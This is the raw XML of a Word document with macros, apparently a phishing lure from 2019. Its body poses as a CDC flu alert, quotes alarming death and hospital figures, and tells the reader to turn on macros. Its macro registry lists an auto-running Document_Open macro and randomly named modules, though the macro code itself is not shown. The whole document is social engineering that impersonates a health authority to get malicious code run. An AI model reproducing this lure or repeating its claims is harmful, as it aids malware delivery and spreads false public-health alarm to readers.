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8C1" w:rsidRPr="003C68C1" w:rsidRDefault="003C68C1" w:rsidP="003C68C1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Centers for Disease Control and Prevention" </w:t>
      </w:r>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Please take notice of this special caution! At this stage, flu virus activity is severely elevat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ed. US Center for Disease           </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Contro</w:t>
      </w:r>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l and Prevention states that within </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> last 4 months, the situation has destabilized essentially: almost 20 thousand diseased people have died already, as well as 220 thousand were urgently put in the hospitals. Prescriptions DOC</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Please , on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>macros,and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C68C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> see all . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1BF1" w:rsidRPr="003C68C1" w:rsidRDefault="000B1BF1" w:rsidP="000B1BF1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000B1BF1" w:rsidRPr="003C68C1" w:rsidSect="000B1BF1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BF1"/>
    <w:rsid w:val="000B1BF1"/>
    <w:rsid w:val="003C68C1"/>
    <w:rsid w:val="00760600"/>
    <w:rsid w:val="00901F79"/>
    <w:rsid w:val="00CC0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C1FB3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F3CF6CD9-E847-4007-B91D-F5D3513FD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68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Open/>
  </wne:docEvents>
  <wne:mcds>
    <wne:mcd wne:macroName="PROJECT.FS2EA79.PGNEB" wne:name="Project.Fs2Ea79.PgNeb" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.FS2EA79.Z" wne:name="Project.Fs2Ea79.z" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.DG51ETH.FREEB" wne:name="Project.dG51etH.freEB" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.DG51ETH.J7IRHSDO" wne:name="Project.dG51etH.j7IrHSdo" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.DG51ETH.SLB7MPH" wne:name="Project.dG51etH.slB7mpH" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.DOCUMENT_OPEN" wne:name="Project.ThisDocument.Document_Open" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.LFMUD.HGRGKD" wne:name="Project.lfmUd.HGRgkD" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.LFMUD.P741V" wne:name="Project.lfmUd.P741v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9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1D903-CBC9-4B56-A9DB-77B42818A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2019-02-28T10:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-28T10:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>